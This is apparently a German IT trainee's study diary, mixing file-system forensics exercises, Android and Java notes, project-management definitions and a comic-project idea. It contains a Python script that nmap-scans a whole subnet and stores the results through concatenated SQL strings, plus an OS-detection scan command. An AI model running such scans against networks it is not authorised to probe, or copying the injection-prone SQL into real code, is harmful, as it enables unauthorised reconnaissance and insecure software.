Metadaten: “Speichert man eine Datei auf einem Computer ab, so muss nicht nur der Dateiinhalt (Nutzdaten) gespeichert werden, sondern auch Metadaten, wie zum Beispiel der Zeitpunkt der Dateierstellung. Gleichzeitig muss der Computer einem Dateinamen – inklusive Dateipfad – die entsprechenden Nutzdaten und Metadaten effizient zuordnen können. Die Spezifikation, wie diese Daten organisiert und auf einem Datenträger gespeichert werden, nennt man Dateisystem. .. Dateisysteme unixoider Betriebssysteme – wie Linux und Mac OS X – verwenden sogenannte Inodes. Diese enthalten die Metadaten sowie Verweise darauf, wo Nutzdaten gespeichert sind. ”

Spasszitat: “Soll also beispielsweise die Datei /bin/ls geöffnet werden, so läuft dies, vereinfacht, wie folgt ab: 1. Der Dateisystemtreiber rubbelt seinen Penis und wichst auf den Superblock, dadurch erfährt er die Startposition der Inodes und deren Länge, somit kann nun jeder beliebige Inode gefunden und gelesen werden. 2. Nun wird der Inode des Wurzelverzeichnisses geöffnet. Da dies ein Ordner ist, befindet sich darin ein Verweis auf die Speicherstelle der Liste aller darin enthaltenen Dateien mitsamt ihren Lachnummern. Darin wird das Verzeichnis bin gesucht. Nein, Inodenummern!” http://www.sleuthkit.org/sleuthkit/man/icat.html ntfs: New Technology File System.

Mkfs.ext3 file.img mkfs.ntfs -F file.img

Mir den files von gestern ils, icat ausprobieren. Dateien erstellen `a` ½ GB a) ext 2/3/4 formatieren b) ntfs formatieren mounten, cp files (jpg), sync, delete file, umount, ils icat todo: dd if=/dev/zero of=diskFileExt3.img bs=1M count=512 dd if=/dev/zero of=diskFileNtfs.img bs=1M count=512 mkfs.ext3 diskFileExt3.img mkfs.ntfs -F diskFileNtfs.img mkdir /mnt/diskExt3 mkdir /mnt/diskNtfs mount diskFileExt3.img /mnt/diskExt3/ mount diskFileNtfs.img /mnt/diskNtfs/ cp /home/ingo/Pictures/kartoffel.jpg /mnt/diskNtfs/ cp /home/ingo/Pictures/kartoffel.jpg /mnt/diskExt3/ cp /home/ingo/Downloads/id.jpg /mnt/diskNtfs/ cp /home/ingo/Downloads/id.jpg /mnt/diskExt3/ sync rm /mnt/diskNtfs/id.jpg rm /mnt/diskExt3/id.jpg umount /mnt/diskNtfs/ umount /mnt/diskExt3/ strings hexdump md5sum dd, mount

Bilder-Chronik anschauen: strings /home/max/Bilder/314075687.jpg

Reguläre Dateien Mißhandelt von einem Umlaut .. zitat: “Als „ausführbar“ gelten nicht nur kompilierte Programme, sondern auch Skripte, bei denen der Shebang den zu verwendenden Interpreter angibt.”

Alles verstanden? Klar doch!

Oo: “7. Narcissists. Highly narcissistic killers who are often possessive, not distinctly psychopathic, but “with a psychopathic core.“ They typically kill loved ones or family members out of jealousy.” https://nerdicwalker.wordpress.com/2016/10/08/irods-icat-installation-ubuntu-16-04-lts-and-mysql-dbms/

19.1.2017 Linux: Python mit Ingo das debianmodul, dass die pythonlibrary einbindet mysql usw

Thema: directory groesser als 1GB anzeigen du / -h --max-depth=1 | grep '[0-9]G>' scan.py : #! /usr/bin/python


#
# insert rechner die online sind in db
#

import os
import MySQLdb

# verbindung zur DB
db = MySQLdb.connect(host="192.168.22.232", # your host, usually localhost
user="ingo", # your username
passwd="some_pass", # your password
db="scan")

# you must create a Cursor object. It will let
# you execute all the queries you need
cur = db.cursor()




cmd="nmap -p 80 "


for i in range(1,256):
ip = "192.168.22." + str(i)
exex = cmd + ip
#print(exex)
lines=os.popen(exex).read()
if lines.find("1 host up") > -1:
print (ip + " is online")
print ("INSERT INTO scaner (ipnr) VALUES ('" + ip + "');")
cur.execute("INSERT INTO scaner (ipnr) VALUES ('" + ip + "');")
db.commit()

db.close()
con.py :

#! /usr/bin/python
import MySQLdb

db = MySQLdb.connect(host="192.168.23.6", # your host, usually localhost
user="ingo", # your username
passwd="some_pass", # your password
db="scannerdb")

# you must create a Cursor object. It will let
# you execute all the queries you need
cur = db.cursor()

# Use all the SQL you like
cur.execute("DESC scanner")

# print all the first cell of all the rows
for row in cur.fetchall():
print row[0]
print row[1]
print row[2]
db.close()

usr/bin/while.py

#! /usr/bin/python2.7 satz="hello" """print (satz)""" cnt=0 while cnt <= 5: print(cnt) cnt+=1 print ("------") print (cnt) print ("------") cnt =0 while cnt <= 5: if cnt !=5: print (satz + str(cnt)) #"""counter umwandelt in buchstaben""" else: print ("bye bye") cnt = cnt +1

Sublime text ?? sudo add-apt-repository ppa:webupd8team/sublime-text-3
sudo apt-get update
sudo apt-get install sublime-text-installer

http://unix.stackexchange.com/questions/87183/creating-formatted-partition-from-nothing

http://www.campus64.com/digital_learning/data/cyber_forensics_essentials/info_file_system_forensic_analy sis.pdf nmap -O -p20 ip os-scan

Ingo erzählte mir vor ein paar Tagen, dass man das Betriebssystem (Linux) über Python mit dem 3D- Grafikprogramm Blender kombinieren kann! Die Prozessorleistung lässt sich in 3D-Objekte umrechnen, die sich bei geringer Leistung verkleinern, bei hoher Leistung vergrößern.

Meine Idee dazu: Ein Spiel draus zu machen! Es funktioniert nach dem Prinzip vo Audiosurf: Bei Audiosurf ist es eine Wave-Datei mit jeder x-beliebigen Musik, welche in das Spiel geladen wird. Dann passt sich die Levelarchitektur atmosphärisch und rhythmisch an die Tonspur an. Wird Hard metal gespielt, erscheinen viele Gegenstände, die dem Auto vorne auf der Straße liegen, denen es ausweichen muss und Rot und “warme Farben” prägen die Levelatmosphäre. Bei Bob Dylan hingegen strahlend blauer Himmel und eine halbwegs relaxte Fahrt ohne viele Hindernisse. Mir schwebt was ähnlcihes vor, nicht in Form einer Audiospur, sondern der Prozessorgeschwindigkeit. Es wird ein Block pro ALU eines Prozessors sein, bei einem Intel i5 wären es mehrere millionen !! Die Prozessorgeschwindigkeit eines Systems ist nicht statisch, es ist mal stärker, mal schwächer ausgelastet, entsprechend blähen sich die Würfel auf, je nach dem welche Alu stärker belastet wird und welche weniger. Stellt euch vor, man müsste ein ganzes Feld sich vergrößernder und verkleinermder Hindernisse hüpfend überwinden. Super Mario würde sich direkt mit Intel auseinandersetzen! Aber, meine Spieleidee ist etwas ganz eigenes, das spricht total für sich, womöglich würde ich ein eigenes Genre bilden: “spirituelle Spiele”. Ich habe vor, mein Spiel “Tengri” zu nennen. Tengri ist eine animistische Religion aus der Mongolei. Weil die Mongolei sehr ressourcenarm ist, hat sich der Glaube dort entsprechend entwickelt. Je bescheidener du bist, desto gnädiger sind die Geister mit dir. Je ressorchenfressender, desto mehr hürden sie dir in den Weg. Die Beschreibung “Hürden sie dir in den Weg legen” könnte man bei Tengri wörtlich nehmen. Je mehr CPU du hast, desto schwerer wird es für deinen Spielecharakter, das Hindernisfeld zu überqueren, je weniger CPU, desto leichter wird es sein. Das Spiel spricht direkt das Karma des Spielers an – je mehr Geld er für schnelle Hardware ausgibt, desto verschwenderischer ist er und die Geister legen ihm mehr Hürden in den Weg! Die Story des Spiels ist furchbar simpel: Bogenschütze Karung und seine Freundin Borte reiten durch die mongolische Steppe. Doch plötzlich kommt ein Gewitter und trennt die beiden. Karung findet Unterschlupf in einer Höhle. Nach dem Sturm bittet er die Gester um Gnade, damit er Borte wieder findet. Ein Hindernislauf über einem unruhigen Untergrund beginnt – der von der CPU direkt gesteuert werden würde !!

Zitat: “This document is to give an understanding of how python and blender fit together” cool cool cool !! import bpy “Blender provides the bpy module to the python interpreter. This module can be imported in a script and gives access to blender data, classes, and functions”

Kann man C in Blender “kapseln”? Zitat: “PyCapsule This subtype of PyObject represents an opaque value, useful for C extension modules who need to pass an opaque value (as a void* pointer) through Python code to other C code. It is often used to make a C function pointer defined in one module available to other modules, so the regular import mechanism can be used to access C APIs defined in dynamically loaded modules.” Eigentlich wollte ich wissen, wie “Verkapselung” unter Blender aussieht. Blender/Python: Running script in Blender: alt+p toggle to full screen: shift+spacebar blender console: bpy. If the cursor ist behind bpy., then strg + spacebar; zeigt er alle Varietäten an, die nach bpy möglich sind. https://www.youtube.com/watch?v=1rOc1b740Ds

Script awesome shapes: https://www.youtube.com/watch?v=uWvIdWBsv2Y

Rendering with Command Line: https://www.youtube.com/watch?v=wBr4y1c2U10 text from python in blender: https://www.youtube.com/watch?v=D-pTF3KrTOQ

3D-Counter: https://www.youtube.com/watch?v=Mm8DWrB35ow https://www.youtube.com/watch?v=JbyfpD8T4CA

Ein Pythton-Script greift dann auf eine Datenbank zu (bzw. Ist fehlerfrei), wenn ich python con.py sage. Aber ./con.py und bash con.py funktionieren nicht !

Ihr kommt gerade rechtzeitig, die nachmittagsliste ist noch nicht da.

20.1.2017:

21.1.2017 Selbstlernen:

Zitat: “Shebang (auch Magic Line) bezeichnet bei unixoiden Betriebssystemen die Zeichenkombination #! am Anfang eines Skriptprogramms, ähnlich einer Dokumenttypdefinition....”

Shebang, Shebang, lalalalala Shebang Shebang Arirang...

“...Die Markierung mit Doppelkreuz und Ausrufezeichen führt dazu, dass das folgende Kommando mitsamt allen angegebenen Argumenten beim Aufruf des Programms ausgeführt wird. ”

Skonto: “ein Nachlass im Preis einer Ware, der gewährt wird, wenn der Kunde diese sofort bezahlt.” Abgestuft. Übl. Nach 4 wochen rechnung fällig, im Verzug. Ich liefer nur per vorkasse, dann gibt es skonto, gewährung höherer Rabatte.

Netzplan: Zizat: “Die Netzplantechnik verwendet Netzpläne, die eine temporale und finale Verkettung von Aktionen beschreiben. Sie findet ihre Anwendung insbesondere in der Terminplanung von Projekten. Netzpläne wiederum sind die grafischen Abbildungen von Vorgangsketten. Da eine Aktivität mehrere Vorgänger- und ggf. auch Nachfolgeaktivitäten haben kann, entsteht so das Bild eines Netzes von Vorgängen, von dem sich die Bezeichnung ableitet. .. ”

Kritischer Pfad: “Als kritischen Pfad bezeichnet man in einem Projektplan die längste Kette von Vorgängen und Meilensteinen, bei denen es keinen Puffer gibt. .. Der kritische Pfad bestimmt die Mindestprojektdauer. .. Die Vorgänge und Meilensteine auf dem kritischen Pfad hängen zeitlich und/oder logisch voneinander ab. .. Die Elemente auf dem kritischen Pfad haben allesamt keine zeitlichen Reserven. Sie müssen pünktlich fertig werden, sonst ist die geplante Projektdauer gefährdet. .. Die Methode des kritischen Pfades (auch CPM, Critical Path Method, genannt) dient dazu, Engpässe im Projekt aufzuzeigen. .. Mit Hilfe des kritischen Pfades können Projektmanager rechtzeitig erkennen, bei welchen Vorgängen im Projekt Verzögerungen besonders riskant sind und von Anfang an gegensteuern. Die Vorgänge auf dem kritischen Pfad sollten daher noch engmaschiger überwacht werden als die übrigen Vorgänge im Projekt. Schafft man es, bei den kritischen Vorgängen Zeit einzusparen, kann man die Laufzeit des gesamten Projektes verkürzen. ”

Lastenheft: Das Lastenheft (teils auch Anforderungsspezifikation, Anforderungskatalog, Produktskizze, Kundenspezifikation oder englisch Requirements Specification genannt) beschreibt die Gesamtheit der Anforderungen des Auftraggebers an die Lieferungen und Leistungen eines Auftragnehmers. Beschreibt Auftragsgeber. Was man vom Auftraggeber erhält.. oder??

Pflichtenheft: Das Pflichtenheft beschreibt in konkreter Form, wie der Auftragnehmer die Anforderungen des Auftraggebers zu lösen gedenkt – das sogenannte wie und womit. Beschreibt Auftragsnehmer. Es zeigt, wie der Auftragnehmer wie Wünsche des Auftraggebers lösen will. Oder? Und ist das, was wir bei Hr. Leu gemachft hatten, unser Klassenraumplanungsprojekt letztlich ein Pflichtenheft gewesen?? In Form eines Angebots.. Das müssen wir als PC-Vertrieb als Angebot schreiben, ODER?

Wasserfallmodell: “Das Wasserfallmodell ist ein sequenzielles Vorgehensmodell, das die Entwicklung anhand aufeinanderfolgender Phasen organisiert.” Aber das war nicht der Ursprungstext, den ich hier eingefügt hatte. “Noch bevor die inhaltliche Konzeption eines umfangreichen Webprojekts beginnt, stehen die Verantwortlichen vor einer entscheidenden Frage: Mit welcher Arbeitsweise ist eine erfolgreiche Durchführung des Projektes am schnellsten und effizientesten zu realisieren? Zwei sehr gegensätzliche Vorgehensweisen aus dem Projektmanagement erfreuen sich dabei noch immer großer Beliebtheit: das Wasserfall-Modell und das agile Scrum-Modell. .. Das Wasserfall-Modell: Anhand eines klar definierten Ablaufs wird das Projekt schrittweise bearbeitet. Eine Aufgabe wird erst begonnen, sobald die vorherige Stufe beendet ist. ” Und ist es Teil des Kick-Off-Meetings ... nicht nur über eine halben tag wie kickoff nein, das Wasserfallmodell ist ein Modell, wie man software entwickelt.

ö. und inwiefern ist es noch Teil des Projektstrukturplans? Kickoff: Kann ein teil sein

Kick-Off: “Ein guter Kick-off-Workshop im Projekt versetzt das Projektteam bereits zu einem sehr frühen Zeitpunkt in die Lage zielgerichtet zu arbeiten” “Ein gelungener, motivierender Projektstart ist durch nichts zu ersetzen. Gerade deshalb laden erfahrene Projektleiter zu Beginn des Projektes zu einem Kick-Off-Meeting ein. Ein Kick-Off-Meeting ist eine Besprechung aller relevanten Projektbeteiligten, die zugleich den offiziellen Projektstart oder den Beginn einer neuen, wichtigen Projektphase markiert.”

Projektstrukturplan: Der Projektstrukturplan (PSP) (engl. work breakdown structure; abgekürzt WBS) ist das Ergebnis einer Gliederung des Projekts in plan- und kontrollierbare Elemente. Ein Projekt wird im Rahmen der Strukturierung in Teilaufgaben und Arbeitspakete unterteilt. Teilaufgaben sind Elemente, die weiter unterteilt werden müssen, Arbeitspakete sind Elemente, die sich im PSP auf der untersten Ebene befinden und dort nicht weiter unterteilt werden. Arbeitspakete enthalten die Elemente (Vorgang, Vorgänge), die für die weiteren Planungsstufen benötigt werden. Die Erstellung eines Projektstrukturplans ist nach heutigem Erkenntnisstand des Projektmanagements eine der zentralen Aufgaben der Projektplanung. Der PSP ist die Grundlage für die Termin- und Ablaufplanung, die Ressourceneinplanung und die Kostenplanung. Zudem fließen die Erkenntnisse aus dem PSP in das Risikomanagement ein. Weil er als Grundlagenplanung für ein Projekt angesehen werden kann, wird der PSP gerne als „Plan der Pläne“ bezeichnet.

Flowchart-Programme: ..sind für die Darstellung von Geschäftsprozessen, Netzpläne, z.B. Powerpoint, Yed ..

Die Effektivität der Projektarbeit hängt sehr stark von der Qualität der Teamarbeit ab.

Die Ecksäulen eines Projektes: Qualität/Funktionalität, Zeit/Temine, Kosten.

Das Projektmanagement-Tool: - Es muss einfach sein und nach ca. 2-3 Tagen verstanden werden, - einheitliche Oberfläche/Logik - Transparenz bei bestimmten Ereignissen des Tools (BSP: Engpasswarnung) - Schnittstellen zu anderen Systemen/Internet -Multiprojekt-Management muss möglich sein -Kosten/Service

Ein guter Kick-off-Workshop im Projekt versetzt das Projektteam bereits zu einem sehr frühen Zeitpunkt in die Lage zielgerichtet zu arbeiten. .. Damit ein Kick-off-Workshop erfolgreich durchgeführt werden kann, ist es wichtig, dass verschiedene Voraussetzungen gegeben sind:

-Wichtigste Voraussetzung ist, dass Klarheit über das zu erreichende Projektziel herrscht. Dazu muss die Zieldefinition den SMART-Kriterien genügen. Orientar Agua = Zielwasser

Xml: Viele wichtige Technologien sind bereits aus der Verbindung von Geisteswissenschaften und IT hervorgegangen – die bekannteste ist vielleicht die Extensible Markup Language (XML), die ausgehend von der digitalen Erfassung literarischer Texte entstanden ist und heute in so gut wie jeder Form von Informationskodierung im Internet genutzt wird.

22.1.2017 Android mit antje Osten Handys routen heißt, dass man da sein eigenes Betriebssystem drauf spielen kann. Andy Rubin erfand Android 2008, es basiert auf Linux.

Was ist anwendersoftware -> browser, prüfungsrelevant werkzeugkette sandbox root Linux/Android: Statt glibc gibt´s bionic. Software für anrufen Android = open source Untergrund: c-Bibliothek linux in c programmiert. Ein OS in objektor.. sprache hat antje noch nicht erlebt. browser: in c geschrieben bionic -> bsd-lizenz, kleiner, schneller als glibc bsd = nicht ganz so schlimm wie open source sqllite relationale datenbank .. für spielstände, von außen daten zu holen aus dem web, ..json .. niemand über handy auf eine datenbank, verboten, weil pw über äther. was sind frameworks -> prüfungsrelevant und wie es funktioniert. Runtime wird unsin die füße schießen .. heikel android prog.. java ist so fett für apps ..

Pfad zum Android Studio: C:\Users\maxifax\AppData\Local\Android\sdk Voreinstellung so lassen .. Google will nicht mehr in der Ecplipse sondern Android Studio. Unterschied zwischen Entwicklungsomgebung und compiler ?? Compiler teil einer entwicklungsumgebung, EU muss Editor haben, Synthax-Highlighting, debugger, Geschwindigkeitsmesser.

Android studio: Wenn wir in der Firma sind, denk an Antjes magische Worte: https activity, content, broadcast - provider, muss in fleisch und blut übergehen.

Activity Bedienoberfläche einer App: signal messeger benutzt snowden, ist sicherer als whatsapp. kann auch mehr activities haben. History stack. Man kann keine apps löschen ? History Stack zeigt auf Activity von Apps. Betriebssystem = zygote.

Service ist eine Applikation in Google android, läuft im Hintergrund. Keine nutzerfläche. Kapselt. Remote services.

Broadcast Receiver, eine App kann "abonnieren". Push Notification. Content Provider guckt n textdateien rein. Model view Control müssen wir beten können. Blender: Würfel können sich nach Prozessorleistung vergrößern und verkleinern. Android: Intent = Schnittstelle, die alle tut, kontakt zum "Universum". explizit .. öffnet browser und implizierte Intents. Zu Android Studio: Gradle nicht durcheinnderbringen, während er arbeitet, ist tödlich. Wie maven, Zusatzprogramm, dass Zusatzarbeit leistet. Haxm installiert, von Intel für indows, damit es beschleunigt. Bei Linux gibt´s kein Haxm. Heap ist speicher.

Sehr interessant ist auch, dass bei Apps Java nur ander Oberfläche ist und das eigentliche Programm in c geschrieben ist. "If the script runs for too long or you accidentally enter an infinite loop, Ctrl+C in the terminal.." Zurück zu Android: “XML-Gesockse” sagte Antje. Das war gut von ihr, jetzt bleibt das Wort bzw. Die Abkürzung “Xml” in meinem Kopf hängen. Wirtschaft als Geschichte erzählen und diese Pädagogik macht die Ausbildung geil...

Man kann Dateien aufs Handy pushen.

GEIL! über die adb.exe kommtr man mit shell adb oder adb shell rein. erstes großes ist ein relatives, für spiele usw. abstand padding oder margin. abstand von der kante geben. Warum dieses HTML-Artige? Damit der DESIGNER sein Ego ausleben darf. das zweite ist das Lineare.

Java: mit super reiche ich es der mutterklasse hoch: "super.onCreate(savedInstanceState);"

TextView textView1 = draufklicken, dann alt+enter sagen, importiere die klasse. Float ist der kleinere, double der größere

View= Vewrerbungshierachie !! und sieht nur hübsch aus. Uhr=Widget Layouts = können Elemente in sich aufnehmen.

Es gibt horizontale und vertikale layouts. Vererbung: Mutter aller Mütter = View. Wenn ich insgesamt absolutes Layout hab ist alles schrott. Resourcenoder: kene große Buchstaben, beim Bild. gif, jpg, png

Das gemeine Tier existiert nicht. UML, Klasse. Das Tier ist ein Schnittstelle.

Bei einer abstrakten Klase muss gebeLaut redefiniert werden. //Das is Polymorphie und ich kann davon ausgehen, dass alle, die Tiere sind, zwangsdefinieren mussten, gebe laut.

Software soll "meschlcich"?? denken (spezifistisch denken) !! dinge, die nix miteinader zu tun habenm können unter einer gemeinsamkelt verbunden werden, das Interface !!

23.1.2017 Programmierung mit Antje Osten

Android-Studio starten: root@deb-saiyajin:/home/max/Downloads/android-studio/bin# ./studio.sh man kann es auch als path setzen, in die .bashrc, vermutlich.. könnte vielleicht auch mit eclipse funktionieren Dann kan man es überall starten!

Alte mobile geräte mit Android nehmen.. Wenn sim-karte nicht mehr funktioniert rooten, oder routen wir die. 3 Wochen Android-Unterricht ist zu wenig. In einer Firma ist ein Satz an alten Geräten, weil Emulatoren nicht richtig sind Mankos stopfen. root@deb-saiyajin:/home/max/Dokumente/java/Augentool# javac Gesicht.java Er will auch auskommenetiertes als Code kompilieren, was natürlich nicht funktioniert.

Alte mobile geräte mit Android nehmen.. Wenn sim-karte nichzt mehr funktioniert rooten, oder routen wir die. 3 Wochen android-Unterricht ist zu wenig. In einer Firma ist ein Satz an alten Geräten, weil Emulatoren nicht richtig sind Mankos stopfen.

Shift + s löst mit offenen vlc Snapshots aus! For a Video I'm watching.

24.1.2017 Krank (in Spechthausen, Treffen mit Barnie)

25.1.2017 Java: Anonyme Klassen Anstatt Google Cloud: Ausdrucken. Public static void wird in array ausgegeben. Argumente werden in array rein gepackt.

In array mehrere parqmeter abgreifen. Im stack trace wird gezeigt, wo main anfängt.

//Was ist eine float machine: // das ist das, was den matisse zurückrechnen mit punkt, ist im prozessor fest verdrahtet

Android installieren auf 14.04.1 LTS 64bit Einige Android Platform-Tools benötigen 32bit Bibliotheken. In Trusty Tahr 64bit steht die frühere Möglichkeit der Installation der ia32-libs nicht mehr (so einfach) zur Verfügung. Ein Workaround: sudo apt-get install lib32stdc++6 sudo apt-get install lib32z1

Scheisse, wie startet man noch mal Android unter Debian ??

--

// wir fangen oben an mit klasse, membervariablen initialisiert, // dann Beispiel für standardconstructor, wo man studenten bauen kann ohne Parameter, // dann überladener Konstruktor ist dafür da, dass man dem Objekt sofort für alle Membervariablen WErte geben kann.

// Das Gleichnis aus dem alten Griechenland 26.1.2017: Lebenszyklus einer Android Activity.

Prozesse werden unter Android nicht gekillt. Nur gekillt wenn wir sagen wirklich zwingend killen.

Java (Android) und Specher: Immer wenn ein neues Objekt gebildet wird, immer wenn "new" steht, gehen die Daten in den heap. OnResume = Spielstände einpflegen. Expliziter Intent .. activities manifest = welche activity gehört zum Projekt Still - oo - mat. Popel 1. Activities 2. Services 3.BroadcastReceiver gehören in das Manifest Activity kündigt Klasse an.

Auf windows kleines Screemfilm-Progrämmchen installiert: McCam Studios.

Äps for Ref-U-Dschääääääs bauen? KUHL !!! nachher

Wir machten bis zum.. 27.1.2017 die drei Säulen der Objektorientierung in Java mit Antje Osten

Nur die Hälfte verstanden, aber es gibt hier ein SEHR gutes Tutorial, dass mir die erste Säule + die zweite Säule super erklärt hat: https://www.youtube.com/watch?v=0GAe8ySQZgI

VPN is basically the same as used by all database banking and financial company's. So unless they want to shut down every ATM and online payment system they will be around for some time yet. All China does is find out the VPNs IP and blocks it by subscribing to the popular services. Checking the data on 1 billion computers and mobile phones is quite expensive, Thousands of servers world wide ruining Windows server 2008 2012 have been hacked and private VPNs installed . You can even buy a simple usb plug and plug it into a server with do not remove on it you have a tunnel shield and VPN, A raspberry pie can run a VPN and tunnel shield in your mates basement good luck finding that lot. They could not find a Boeing 777 government departments always overestimate their ability when they ask for next years budget. Even without a red envelope. Thousands of Chinese hackers work on it every day they like their porn take away a hackers porn he will find a way.

Grafikkarte für Laptops (etwas veraltet): ATX 800

Auch eine tolle Aufgabe: Metadaten von Bildern auslesen (mit PHP). Beziehungsweise könnte man mit PHP einrichten, dass direkt die Metadaten ausgelesen und angezeigt werden, was Ingo mit uns in python, oder java, machte....?? http://php.net/manual/de/function.exif-read-data.php

Shift + s löst mit offenen vlc Snapshots aus! In a Video I'm watching.

Im Verzeichnis: Das sieht mir nach einem Haufen gepackter Druckertreiber von Ricoh aus: /opt/OpenPrinting-Ricoh/ppds/Ricoh

Wenn ich jetzt noch in der Cimdata wäre und noch wüsste, wie der Drucker heisst, könnte ich den Treiber installieren.. . Suchfunktion mit php ind jquery, bei Gelegenheit: https://www.youtube.com/watch?v=i9C4Udl1MLs strg + - gleichzeitig drücken: shell schrift verkleinern.

Mit subnetcalc automatisch Subnetze berechnen lassen: subnetcalc 193.104.220.21/10 wdb-suchportal.de damit hatte martin seine schulung linux raus gefunden. dmesc zeigt alle Prozesse an, die der Rechner seit dem hochfahren so hat. dmesg >> /home/max/4erkernel_lenovo.txt Wenn man dann das in eine Skriptdatei packt und im System mit dem anderen Kernel (3erkernell_lenovo.txt) wiederholt, kann man vergleichen, was der andere Kernel anders macht. Martin benutzte sogar extra ein Programm, das farblich anzeigen konnte, was beim neuen Kernel raus genommen wurde (rot) und was hinzugekommen ist (grün). Grau bedeutete unverändert.

Scheisse, wie startet man noch mal Android unter Debian ??

28.1.2017:

Die ganze Zeit hatte ich mir heute objektorientierte Programmierung angeschaut, SQL-Zugriffe teils standarisiert und gefühlt recht viel Zeit verschwendet.

Die Prüfungsaufgaben analysieren, um die Lösungsblätter zu finden und das mit dem Subnetzmasken- Tutorial-Gucken steht auch noch aus.

Bewerben um ein Praktikum und dann muss noch begründet werden, warum ich gefehlt hatte. Was kann man denn dazu gut schreiben?

29.1. Bild gezeichnet, den ganzen Tag .. (eigentlich nicht Gegenstand der Zusammenfassung)

30.1. Prüfungsvorbereitung Netzwerk / Zwischenprüfung. Subnetzmasken hauptsächlich mit Anatol Schirmer ich hab den anders in Erinnerung vom Aussehen..

Mathias Rüdiger befahl: Übt!

Lese gerade im großen Ordner: “Manche IP's sind kein BC, weil sie mitten in der Range (dem Angebot) liegen”.

Kaltgerätestecker und Warmgerätestecker. Wenn man mit einer 22-erSubnetzmaske die Anzahl aller möglichen Subnetze pro IP berechnen möchte, dann zeigt die 22 schon an, wie viele Subgnetze möglich sind.

Bandlaufwerke: nicht überflüssig https://de.wikipedia.org/wiki/Bandlaufwerk

Abschlussprüfung Winter 2014/15 An dieser Stelle habe ich im Hefter die Abschlussprüfung Winter 2014/15 eingefügt, wo auf der ersten Seite das Kalkulationsshema/Warenkalkulation ist, abtippen dann geht es darum, was man macht, wenn etwas z.B. mangelhaft geliefert wurde, Hardware beschaffen und NAS, englischen Test übersetzen, Merkmale, die ein Tablet besitzen sollte, NAS das als Raid 5 oder 10 konfiguriert werden soll, drei Merkmale von VLANS, statisch und dynamisches VLAN, VLAN einrichten, Projektplanung: SMART-Regelm .. spezifisch, messbar, ansprechend, realistisch, terminiert, wann das Projekt beendet sein soll, kritischer Pfad erläutern, Vorzug d. Darstellungstechnik Netzplan gegenüber Balkendiagramm, Inventardatenbank erstellen (Ich vermute relationale Darstellungsform ER-Modell 3.Normalform), (Wär gut Stoff, den ich mit Tutorial durcharbeiten könnte) Erweiterung der Inventardatenbank, Datenbank planen, Datenbank umsetzen mit MySQL, richtigen sql-Befehl für Daten eintragen angeben, Aktualisierung einer Firma in einer Datenbank, Liste der Liederanten und derer Umsätze im Jahr 2014, Datum Erstkontakt hinzufügen, Liste aller inventarischer Wirtschaftsgüter, deren Nutzungsd. Im Jahr 2015 endet.

KommanditGesellschaft:„Der mit seinem gesamten Vermögen haftende Gesellschafter heißt Komplementär, der lediglich mit seiner Hafteinlage haftende ist der Kommanditist, nach dem die Rechtsform der KG benannt ist .. Eine KG ist Kaufmann im Sinne des Handelsgesetzbuchs. .. Die Accomenda war eine im Mittelalter gebräuchliche Art von Gesellschaftsvertrag, wonach jemand (der Kommendator) einem anderen (dem Kommendatar) Geld oder Sachen anvertraute, um damit gegen einen Anteil am Gewinn und am Risiko überseeischen Handel zu treiben. Die Accomenda ist die Urform der heutigen Kommanditgesellschaft.“

Bei der Lösung verstehe ich nicht, warum man nicht gleich im SEZ die vollen 18 Minuten gegeben hat .. vielleicht, weil in der FAZ 17 steht ??

..

Struktogramm

31.1.2017: Prüfungsvorbereitung Wirtschaft, CSMA, Stack mit Jörg Schirmer Wikipedia Zitat: “Struktogramme sollten keine programmiersprachenspezifische Befehlssyntax enthalten. Sie müssen so programmiersprachenunabhängig formuliert werden, dass die dargestellte Logik einfach zu verstehen und als Codiervorschrift in jede beliebige Programmiersprache umzusetzen ist. .. In der professionellen Softwareentwicklung werden Struktogramme eher selten eingesetzt. Dort werden vorrangig die Aktivitätsdiagramme der UML (unified modelling language) verwendet”

So abstrakt: "Abläufe im Unternehmen werden über die Struktur (Aufbauorganisation), Prozessregelungen (Ablauforganisation) und Selbstorganisation (informelle Organisation) gesteuert. "

Nicht in offiziellen Unterlagen witzige Bilder legen? Wirklich? Kommt sonst der Sumpfgeist aus der Oase von Al-Dscharablus und killt einen?

Shane empfahl mir: Seeking allah finding jesus

Urban Gc1 = Fahrrad aus Papier.

Praktikum in Medieninformatik:

Buchhaltung: Kosten werden von insgesamt geschuldeten Beiträgen seit 15.3. berechnet, Schulden vom März z.B. sind dann Schulden vom nov, obwohl ich nov gezahlt hatte.

Bruttosozialprodukt: “die Gesamtheit aller Dienstleistungen und Wirtschaftsgüter eines bestimmten Wirtschaftsbereiches innerhalb eines bestimmen Zeitraumes.”

So wie ein Projekt angefangen hat, so hört es auch wieder auf.

Halten Sie es nicht für überflüssig, ihr Projekt gut vorzubereiten..

..hey cool, wie wäre es mit Marketing, Zielgruppenanalyse, Quality-Management für meine Comics ??

Situationsannalyse .. Annely (Herzchen) Ist-Situation, Chancen des Messegangs, Rahmenbedingungen, Schnittstellen zu anderen Projekten, Risiken, Erfolgsfaktoren.

Hallihallo sehr geehrte Damer und herren, ich bin der Max und ihr erwartet sicher, dass mal was cooles passieren soll!. Ich will mit euch meinen Comic ganz groß raus bringen, ich weiß noch nicht wie, aber erst mal sollte die Stückzahl vonn 1000 Heften nicht überschritten werden und das Heft soll Din A5 groß sein! Jegliche Firma kann man kontaktrieren, ob rechte oder linke, hauptsache günstig, es sollte nicht teurer als 100 Euro sein !!

Das Projekt beinhaltet die Vervielfältigung meiner Comics, momentan bin ich noch in der Braunstormphase, ich will Ideen und Anregungen sammeln, wie man es realiert..

Organisert wird es von euch und mir.

Wie wir genau vorgehen will ich mit euch absprechen .. ich bin der Künstler, ich würde die Qualitätsprüfung machen, wer möchte mein Wirtschaftler sein, der mich managt ?? Die Ist-Situation: Ich habe aktuell schon 100 Euro bereits zur Verfügung, ich kenne eine Druckerei, die für 96 Euro 800 Hefte drucken möchte... Der Chef ist ein Fan von Comics ..

Rahmenbedingung allerdings ist, dass wir dreimal um das Druckereigelände rumrennen sollen, wa swir aber nicht wollen.. Andere Projekte gibt es nicht. Risiken wären, dass man sich über uns lustig machen könnte, wegen dem rennen um das Werksgelände.. Erfolgsfaktor: Unsere Hefte könnten dann 1000 Stück für 98 Euro gedruckt werden !!

Zweck und Ziel ist der Verkauf der Hefte an neue Kunden.#

Grobe Aufgabenstruktur erarbeiten: Anderer Beleiferer finden, oder einen anderen Umgang mit dem Chef der Druckerei.. Teilprojekte sind lala sagen.

GEIL! Grobplanung → Meilensteine festlegen – Lasst uns phantasieren !!

Berichtswesen und Dokumentation regeln!

Erste Ideen Projektmarketing ??

